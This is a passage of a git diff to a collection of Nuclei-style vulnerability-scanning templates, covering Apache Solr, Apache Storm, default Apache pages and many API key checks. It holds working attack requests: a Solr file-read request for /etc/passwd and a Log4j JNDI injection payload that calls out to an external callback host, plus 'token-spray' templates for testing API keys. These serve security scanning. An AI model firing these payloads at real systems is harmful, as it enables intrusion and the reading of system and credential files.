https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: apache,solr,lfi - -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/07/22 diff --git a/poc/apache/apache-solr-log4j-rce-372.yaml b/poc/apache/apache-solr-log4j-rce-372.yaml new file mode 100644 index 0000000000..bd31144333 --- /dev/null +++ b/poc/apache/apache-solr-log4j-rce-372.yaml @@ -0,0 +1,36 @@ +id: apache-solr-log4j-rce + +info: + name: Apache Solr Log4j JNDI RCE + author: Evan Rubinstein,nvn1729 + severity: critical + description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + reference: + - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 + - https://twitter.com/sirifu4k1/status/1470011568834424837 + - https://github.com/apache/solr/pull/454 + tags: solr,oast,log4j,rce,apache,jndi + +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-solr-log4j-rce.yaml b/poc/apache/apache-solr-log4j-rce.yaml index bd31144333..825bad33de 100644 --- a/poc/apache/apache-solr-log4j-rce.yaml +++ b/poc/apache/apache-solr-log4j-rce.yaml @@ -1,36 +1,77 @@ id: apache-solr-log4j-rce info: - name: Apache Solr Log4j JNDI RCE - author: Evan Rubinstein,nvn1729 + name: Apache Solr 7+ - Remote Code Execution (Apache Log4j) + author: Evan Rubinstein,nvn1729,j4vaovo severity: critical - description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + description: | + Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. reference: - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - https://twitter.com/sirifu4k1/status/1470011568834424837 - https://github.com/apache/solr/pull/454 - tags: solr,oast,log4j,rce,apache,jndi + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + verified: true + max-request: 2 + shodan-query: http.html:"Apache Solr" + tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' -requests: - - method: GET - path: - - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" +http: + - raw: + - | + @timeout: 25s + GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 + Host: {{Hostname}} + + payloads: + endpoint: + - "collections" + - "cores" + attack: clusterbomb matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: body + words: + - 'org.apache.solr' + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' extractors: + - type: kval + kval: + - interactsh_ip + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + +# digest: 4a0a00473045022100c38d41d1823fa63da240e259a1003d23723889cd20ac19f9eaab674d5664a03c022018ea30db1d9f2f1a5c8884ad3b21735fc7a02a73f18e35b35a7ff9506e56d4e9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-storm-unauth.yaml b/poc/apache/apache-storm-unauth.yaml index dc48849fe9..2a2c45e566 100644 --- a/poc/apache/apache-storm-unauth.yaml +++ b/poc/apache/apache-storm-unauth.yaml @@ -1,20 +1,14 @@ id: apache-storm-unauth - info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: - - https://storm.apache.org/releases/current/STORM-UI-REST-API.html - metadata: - max-request: 1 + reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html tags: apache,unauth,misconfig - -http: +requests: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' - matchers-condition: and matchers: - type: word @@ -23,9 +17,6 @@ http: - '"totalMem":' - '"stormVersion":' condition: and - - type: status status: - 200 - -# digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache-test-all-6814.yaml b/poc/apache/default-apache-test-all-6814.yaml index 480d651a06..ce2216bbb0 100644 --- a/poc/apache/default-apache-test-all-6814.yaml +++ b/poc/apache/default-apache-test-all-6814.yaml @@ -3,11 +3,11 @@ id: default-apache-test-all info: name: Apache HTTP Server Test Page author: andydoering - severity: info description: Detects default installations of apache (not just apache2 or installations on CentOS) + severity: info + tags: tech,apache metadata: shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" - tags: tech,apache requests: - method: GET diff --git a/poc/apache/default-apache-test-all.yaml b/poc/apache/default-apache-test-all.yaml deleted file mode 100644 index ce2216bbb0..0000000000 --- a/poc/apache/default-apache-test-all.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: default-apache-test-all - -info: - name: Apache HTTP Server Test Page - author: andydoering - description: Detects default installations of apache (not just apache2 or installations on CentOS) - severity: info - tags: tech,apache - metadata: - shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: regex # type of the extractor - part: body # part of the response (header,body,all) - condition: or - regex: - - ".*?Apache(|\\d+) .*?(Default|Test).*?" - - "(Default|Test).*? Apache(|\\d+).*?" - - extractors: - - type: kval - part: header - kval: - - server diff --git a/poc/apache/default-apache-test-page-6816.yaml b/poc/apache/default-apache-test-page-6816.yaml index 69f573761a..f727151d6a 100644 --- a/poc/apache/default-apache-test-page-6816.yaml +++ b/poc/apache/default-apache-test-page-6816.yaml @@ -1,15 +1,17 @@ id: default-apache-test-page + info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 tags: tech,apache + reference: https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/poc/apache/default-apache-test-page-6818.yaml b/poc/apache/default-apache-test-page-6818.yaml index ade74d648c..268acbeed0 100644 --- a/poc/apache/default-apache-test-page-6818.yaml +++ b/poc/apache/default-apache-test-page-6818.yaml @@ -5,10 +5,11 @@ info: author: dhiyaneshDk severity: info metadata: + max-request: 1 shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -18,3 +19,5 @@ requests: words: - "Apache HTTP Server Test Page powered by CentOS" part: body + +# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-page-6804.yaml b/poc/apache/default-apache2-page-6804.yaml index 2aa462ac02..5b0059bd91 100644 --- a/poc/apache/default-apache2-page-6804.yaml +++ b/poc/apache/default-apache2-page-6804.yaml @@ -4,12 +4,10 @@ info: name: Apache2 Default Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Apache2 Debian Default Page:" tags: tech,apache + reference: https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22 -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -19,5 +17,3 @@ http: words: - "Apache2 Debian Default Page: It works" part: body - -# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-page-6806.yaml b/poc/apache/default-apache2-page-6806.yaml index 2f32e210bc..2aa462ac02 100644 --- a/poc/apache/default-apache2-page-6806.yaml +++ b/poc/apache/default-apache2-page-6806.yaml @@ -5,10 +5,11 @@ info: author: dhiyaneshDk severity: info metadata: + max-request: 1 shodan-query: http.title:"Apache2 Debian Default Page:" tags: tech,apache -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -18,3 +19,5 @@ requests: words: - "Apache2 Debian Default Page: It works" part: body + +# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-ubuntu-page-6810.yaml b/poc/apache/default-apache2-ubuntu-page-6810.yaml index 83b392e20a..3efd0d3dea 100644 --- a/poc/apache/default-apache2-ubuntu-page-6810.yaml +++ b/poc/apache/default-apache2-ubuntu-page-6810.yaml @@ -5,15 +5,19 @@ info: author: dhiyaneshDk severity: info metadata: + max-request: 1 shodan-query: http.title:"Apache2 Ubuntu Default Page" tags: tech,apache -requests: +http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: - "Apache2 Ubuntu Default Page: It works" part: body + +# digest: 4a0a00473045022100daed8690f24f8c0009d7167980aeee76223c786cfdcaf5b5c0e9ec6c830f5c240220648f0f8615f54d45ff1d6f251ef25e42441e1a12c23ee2a6864375e5fe44e494:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-ubuntu-page.yaml b/poc/apache/default-apache2-ubuntu-page.yaml deleted file mode 100644 index 6738fe2192..0000000000 --- a/poc/apache/default-apache2-ubuntu-page.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: default-apache2-ubuntu-page -info: - name: Apache2 Ubuntu Default Page - author: dhiyaneshDk - severity: info - metadata: - shodan-query: http.title:"Apache2 Ubuntu Default Page" - tags: tech,apache -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - "Apache2 Ubuntu Default Page: It works" - part: body diff --git a/poc/api/alfacgiapi-wordpress-256.yaml b/poc/api/alfacgiapi-wordpress-256.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/api/alfacgiapi-wordpress-256.yaml +++ b/poc/api/alfacgiapi-wordpress-256.yaml @@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/api/alfacgiapi-wordpress.yaml b/poc/api/alfacgiapi-wordpress.yaml deleted file mode 100644 index f8d61143d9..0000000000 --- a/poc/api/alfacgiapi-wordpress.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/poc/api/apache-apisix-panel-336.yaml b/poc/api/apache-apisix-panel-336.yaml index 2c6124e710..dbd94dc5bf 100644 --- a/poc/api/apache-apisix-panel-336.yaml +++ b/poc/api/apache-apisix-panel-336.yaml @@ -5,11 +5,14 @@ info: author: pikpikcu severity: info description: An Apache APISIX login panel was detected. - classification: - cwe-id: CWE-200 metadata: fofa-query: title="Apache APISIX Dashboard" tags: apache,apisix,panel + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET diff --git a/poc/api/apache-apisix-panel-337.yaml b/poc/api/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/poc/api/apache-apisix-panel-337.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/poc/api/apache-apisix-panel-338.yaml b/poc/api/apache-apisix-panel-338.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/poc/api/apache-apisix-panel-338.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/api/api-abstractapi-383.yaml b/poc/api/api-abstractapi-383.yaml new file mode 100644 index 0000000000..d817d4faeb --- /dev/null +++ b/poc/api/api-abstractapi-383.yaml @@ -0,0 +1,25 @@ +id: api-abstractapi + +info: + name: Abstract Api Public Holidays Test + author: daffainfo + severity: info + reference: + - https://www.abstractapi.com/holidays-api + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md + tags: token-spray,abstractapi + +self-contained: true +requests: + - method: GET + path: + - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" + + matchers: + - type: word + part: body + words: + - '"name_local":' + - '"location":' + - '"date_year":' + condition: and diff --git a/poc/api/api-abuseipdb-384.yaml b/poc/api/api-abuseipdb-385.yaml similarity index 100% rename from poc/api/api-abuseipdb-384.yaml rename to poc/api/api-abuseipdb-385.yaml diff --git a/poc/api/api-abuseipdb.yaml b/poc/api/api-abuseipdb.yaml new file mode 100644 index 0000000000..ca83d86700 --- /dev/null +++ b/poc/api/api-abuseipdb.yaml @@ -0,0 +1,31 @@ +id: api-abuseipdb + +info: + name: AbuseIPDB API Test + author: daffainfo + severity: info + reference: + - https://docs.abuseipdb.com/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md + tags: token-spray,abuseipdb + +self-contained: true +requests: + - raw: + - | + POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 + Host: api.abuseipdb.com + Key: {{token}} + Accept: application/json + Content-Type: application/x-www-form-urlencoded + Content-Length: 16 + + ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. + + matchers: + - type: word + part: body + words: + - 'data":' + - 'ipAddress":' + condition: and diff --git a/poc/api/api-accuweather-386.yaml b/poc/api/api-accuweather-386.yaml deleted file mode 100644 index 0bc6282dc2..0000000000 --- a/poc/api/api-accuweather-386.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: api-accuweather - -info: - name: AccuWeather API Test - author: zzeitlin - severity: info - reference: - - https://developer.accuweather.com/apis - metadata: - max-request: 1 - tags: token-spray,accuweather - -self-contained: true - -http: - - method: GET - path: - - "http://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece" - - matchers: - - type: word - part: body - words: - - '"Version"' - - '"LocalizedName"' - - '"DataSets"' - condition: and - -# digest: 4b0a00483046022100d00f2152465c3858fe0b7b03fc3e88fbac6b919525f6c0b1c028a09a0ded9c48022100a0781fe50668fe64cea809f8616d799bd7d6b219e9e1bc4dbb2522f5e33b40df:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-accuweather.yaml b/poc/api/api-accuweather.yaml new file mode 100644 index 0000000000..8c1c526443 --- /dev/null +++ b/poc/api/api-accuweather.yaml @@ -0,0 +1,23 @@ +id: api-accuweather + +info: + name: AccuWeather API Test + author: zzeitlin + severity: info + reference: https://developer.accuweather.com/apis + tags: token-spray,accuweather + +self-contained: true +requests: + - method: GET + path: + - "http://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece" + + matchers: + - type: word + part: body + words: + - '"Version"' + - '"LocalizedName"' + - '"DataSets"' + condition: and diff --git a/poc/api/api-adafruit-io-387.yaml b/poc/api/api-adafruit-io-387.yaml deleted file mode 100644 index 87985ad5a3..0000000000 --- a/poc/api/api-adafruit-io-387.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-adafruit-io - -info: - name: Adafruit IO API Test - author: dwisiswant0 - severity: info - reference: - - https://io.adafruit.com/api/docs/ - metadata: - max-request: 1 - tags: token-spray,adafruit - -self-contained: true - -http: - - method: GET - path: - - "https://io.adafruit.com/api/v2/user" - - headers: - X-AIO-Key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"username":' - - '"id":' - condition: and - -# digest: 4a0a00473045022100bd2cde5742fc5e144ec6165cbc4dac66a0c51f4c574e845586f7ad8a47b196cb02206243f827c0ea95f3c051255499e838a938ac1a03275a636a90746a583327cd9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-adafruit-io.yaml b/poc/api/api-adafruit-io.yaml new file mode 100644 index 0000000000..5fc0e8d40c --- /dev/null +++ b/poc/api/api-adafruit-io.yaml @@ -0,0 +1,24 @@ +id: api-adafruit-io + +info: + name: Adafruit IO API Test + author: dwisiswant0 + severity: info + reference: https://io.adafruit.com/api/docs/ + tags: token-spray,adafruit + +self-contained: true +requests: + - method: GET + path: + - "https://io.adafruit.com/api/v2/user" + headers: + X-AIO-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"username":' + - '"id":' + condition: and \ No newline at end of file diff --git a/poc/api/api-alienvault-388.yaml b/poc/api/api-alienvault-388.yaml deleted file mode 100644 index 11968b6017..0000000000 --- a/poc/api/api-alienvault-388.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - description: IP/domain/URL reputation - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/alienvault-open-threat-exchange - metadata: - max-request: 1 - tags: token-spray,alienvault,exchange - -self-contained: true - -http: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and - -# digest: 4b0a00483046022100cfb8a99e6ad24ec70c2e69bf9d67d642aef36f843015c70845938d97ff80c96a022100a44d8300cbd0db289a5e51a128ecd43ae20a9d4960a6632ab18ca6bcbb0192e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-apigee-edge-391.yaml b/poc/api/api-apigee-edge-391.yaml deleted file mode 100644 index e2d7fba259..0000000000 --- a/poc/api/api-apigee-edge-391.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: api-apigee-edge - -info: - name: Apigee Edge API Test - author: dwisiswant0 - severity: info - reference: - - https://apidocs.apigee.com/apis - metadata: - max-request: 1 - tags: token-spray,apigee - -self-contained: true - -http: - - method: GET - path: - - "https://apimonitoring.enterprise.apigee.com/alerts" - - headers: - Authorization: Bearer {{token}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"uuid":' - - '"name":' - condition: and - -# digest: 4a0a00473045022100e845a1ceb69b8a5d6c312ad52ccdbed0e07b6bca2d1cbef0354f9c9f46b486a702203ef383498432551eb9091e1ec2acab8f8a0979e1a66312addc036e38e9de000f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-apigee-edge.yaml b/poc/api/api-apigee-edge.yaml new file mode 100644 index 0000000000..e724933ea0 --- /dev/null +++ b/poc/api/api-apigee-edge.yaml @@ -0,0 +1,29 @@ +id: api-apigee-edge + +info: + name: Apigee Edge API Test + author: dwisiswant0 + severity: info + reference: https://apidocs.apigee.com/apis + tags: token-spray,apigee + +self-contained: true +requests: + - method: GET + path: + - "https://apimonitoring.enterprise.apigee.com/alerts" + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"uuid":' + - '"name":' + condition: and diff --git a/poc/api/api-appveyor-392.yaml b/poc/api/api-appveyor-392.yaml deleted file mode 100644 index d868abd588..0000000000 --- a/poc/api/api-appveyor-392.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-appveyor - -info: - name: AppVeyor API Test - author: dwisiswant0 - severity: info - reference: - - https://www.appveyor.com/docs/api/ - metadata: - max-request: 1 - tags: token-spray,appveyor - -self-contained: true - -http: - - method: GET - path: - - "https://ci.appveyor.com/api/roles" - - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"roleId":' - - '"created":' - condition: and - -# digest: 490a00463044022015e6f1f344553fca9c4d1692f24a0f16dfd25d843ca49e5e964b62de347863e9022059f1676f4a19b82033665201e9ba232546dc2321a3469bad64e04a80191e5af2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-appveyor.yaml b/poc/api/api-appveyor.yaml new file mode 100644 index 0000000000..25bac0e370 --- /dev/null +++ b/poc/api/api-appveyor.yaml @@ -0,0 +1,25 @@ +id: api-appveyor + +info: + name: AppVeyor API Test + author: dwisiswant0 + severity: info + reference: https://www.appveyor.com/docs/api/ + tags: token-spray,appveyor + +self-contained: true +requests: + - method: GET + path: + - "https://ci.appveyor.com/api/roles" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"roleId":' + - '"created":' + condition: and \ No newline at end of file diff --git a/poc/api/api-bible-394.yaml b/poc/api/api-bible-394.yaml new file mode 100644 index 0000000000..ec2ef5312e --- /dev/null +++ b/poc/api/api-bible-394.yaml @@ -0,0 +1,33 @@ +id: api-bible + +info: + name: API.Bible API Test + author: daffainfo + severity: info + description: Everything you need from the Bible in one discoverable place + reference: + - https://docs.api.bible + - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible + metadata: + max-request: 1 + tags: token-spray,bible + +self-contained: true + +http: + - method: GET + path: + - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" + + headers: + api-key: "{{token}}" + matchers: + - type: word + part: body + words: + - "orgId" + - "bookId" + - "bibleId" + condition: and + +# digest: 490a0046304402205e87cb73c18cb16749114c71928bdcb3974dc3659aff91db8102895523a33d9302207d38e6dc9f9c0d024c71725322f44ce3846c31765ead4b26b9ae4ffe5c1ac3d8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-bible.yaml b/poc/api/api-bible.yaml deleted file mode 100644 index 9e47277d90..0000000000 --- a/poc/api/api-bible.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-bible - -info: - name: API.Bible API Test - author: daffainfo - severity: info - description: Everything you need from the Bible in one discoverable place - reference: - - https://docs.api.bible - - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible - tags: token-spray,bible - -self-contained: true -requests: - - method: GET - path: - - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" - headers: - api-key: "{{token}}" - - matchers: - - type: word - part: body - words: - - "orgId" - - "bookId" - - "bibleId" - condition: and diff --git a/poc/api/api-bingmaps.yaml b/poc/api/api-bingmaps.yaml deleted file mode 100644 index 0892d85b9f..0000000000 --- a/poc/api/api-bingmaps.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-bingmaps - -info: - name: Bing Maps API Test - author: zzeitlin - reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address - severity: info - tags: token-spray,bing,maps,bingmaps - -requests: - - method: GET - path: - - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - - matchers: - - type: word - part: body - words: - - 'ValidCredentials' diff --git a/poc/api/api-bitly-396.yaml b/poc/api/api-bitly-396.yaml index 2d348aee2d..0a4c307e15 100644 --- a/poc/api/api-bitly-396.yaml +++ b/poc/api/api-bitly-396.yaml @@ -2,17 +2,13 @@ id: api-bitly info: name: Bitly API Test - author: zzeitlin,geeknik + author: zzeitlin + reference: https://dev.bitly.com/api-reference severity: info - reference: - - https://dev.bitly.com/api-reference - metadata: - max-request: 1 tags: token-spray,bitly self-contained: true - -http: +requests: - method: GET path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" @@ -21,7 +17,6 @@ http: - type: word part: body words: - - '"status_code":200,"status_txt":"OK"' - condition: and - -# digest: 490a0046304402201b2c0fcb9e368924c66fa9fccbaff444d11ce07e5cccfb958ca54963737acf21022022bec99c0126770bf18ce5d4ec3e2f2259d7a9155225394a530a7910bbbf8836:922c64590222798bb761d5b6d8e72950 + - '"long_url":' + - '"created_at":' + condition: and \ No newline at end of file diff --git a/poc/api/api-bitrise-397.yaml b/poc/api/api-bitrise-397.yaml new file mode 100644 index 0000000000..96ca399331 --- /dev/null +++ b/poc/api/api-bitrise-397.yaml @@ -0,0 +1,33 @@ +id: api-bitrise + +info: + name: Bitrise API Test + author: daffainfo + severity: info + description: Build tool and processes integrations to create efficient development pipelines + reference: + - https://api-docs.bitrise.io/ + - 